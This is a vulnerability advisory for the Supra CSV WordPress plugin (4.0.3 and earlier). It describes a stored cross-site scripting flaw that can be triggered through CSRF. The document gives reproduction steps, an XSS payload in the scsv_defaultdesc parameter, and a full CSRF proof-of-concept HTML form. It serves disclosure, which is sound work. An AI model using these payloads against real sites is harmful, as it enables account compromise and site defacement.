WordPress Plugin Vulnerabilities
Supra CSV <= 4.0.3 - Stored Cross-Site Scripting via CSRF
Description
Cross-site Scripting (XSS) is a client-side code injection attack. The attacker aims to execute malicious scripts in a web browser of the victim by including malicious code in a legitimate web page or web application.
I have found a Stored XSS on the plugin Supra CSV Version: 4.0.3. Here is the official page of the plugin given below
https://wordpress.org/plugins/supra-csv-parser
Proof of Concept
Step to reproduce: Step1: Download and install the plugin Step2:Activate and go to the setting of the plugin. Step3:Give the details and intercept the request using burp suite. Step4:The parameter "scsv_defaultdesc="is vulnerable to XSS with the below payload “ xss</textarea></p><script>alert(1)</script>// ” Step5:From this script we can see the plugin is vulnerable to stored XSS. Step6:Generate CSRF payload for the request and send it to the victim. Step7: CSRF payload is given below <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=supra_csv_admin" method="POST"> <input type="hidden" name="scsv_wpname" value="xss1<>"'/" /> <input type="hidden" name="scsv_wppass" value="xss2<>"'/" /> <input type="hidden" name="scsv_autopub" value="0" /> <input type="hidden" name="scsv_posttype" value="post" /> <input type="hidden" name="scsv_defaulttitle" value="xss3<>"'/" /> <input type="hidden" name="scsv_defaultdesc" value="xss4</textarea></p><script>alert(2)</script>//" /> <input type="hidden" name="scsv_custom_terms" value="xss5<>"'/" /> <input type="hidden" name="scsv_csv_settings[delimiter]" value=",xss6<>"'/" /> <input type="hidden" name="scsv_csv_settings[enclosure]" value=""xss7<>"'/" /> <input type="hidden" name="scsv_csv_settings[escape]" value="\" /> <input type="hidden" name="scsv_line_maxlen" value="1000" /> <input type="hidden" name="scsv_submit" value="Update Options" /> <input type="submit" value="Submit request" /> </form> </body> </html> Step8: Stored XSS is successfully executed with CSRF vulnerability.
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Rahul selvakumar
Submitter
Rahul selvakumar
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-05 (about 11 months ago)
Added
2022-11-21 (about 1 years ago)
Last Updated
2022-11-21 (about 1 years ago)